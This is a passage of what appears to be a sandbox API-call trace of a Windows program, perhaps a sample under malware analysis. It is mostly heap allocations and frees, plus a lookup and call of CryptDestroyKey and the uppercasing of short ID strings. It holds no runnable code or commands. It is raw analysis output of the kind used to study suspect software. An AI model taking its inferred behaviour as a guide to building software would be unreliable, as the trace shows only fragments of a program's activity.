lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0163.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0163.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0163.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0163.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0163.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0163.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0163.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0163.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0163.479] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0163.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0163.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0163.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0163.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0163.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0163.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0163.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0163.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0163.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0163.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0163.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0163.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0163.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0163.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0163.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0163.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0163.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0163.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0163.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x34aa430, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0163.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.480] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyKey") returned 0x74d4c51a [0163.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0163.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0163.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0163.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0163.481] CryptDestroyKey (hKey=0xaa5660) returned 1 [0163.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0163.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0163.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0163.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0163.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0163.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0163.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0163.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0163.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0163.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0163.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0163.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0163.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0163.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0163.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0163.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0163.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0163.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0163.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0163.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0163.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0163.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0163.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0163.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0163.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0163.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0163.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0163.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0163.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0163.482] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0163.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0163.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0163.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0163.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0163.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0163.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0163.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0163.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0163.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0163.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0163.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0163.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0163.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0163.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0163.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0163.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.483] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0163.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0163.483] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0163.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3e8 [0163.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0163.483] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0163.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0163.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0163.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0163.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0163.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0163.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.484] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0163.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0163.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0163.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0163.484] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0163.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0163.484] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0163.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0163.484] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0163.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0163.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0163.485] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0163.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0163.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0163.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0163.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0163.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0163.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.485] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0163.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0163.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0163.485] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0163.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0163.485] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0163.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0163.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0163.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0163.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0163.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0163.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0163.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0163.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0163.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0163.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0163.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0163.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0163.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4a8 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6d0 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa628 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6b8 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0163.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa418 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4c0 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0163.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0163.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0163.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 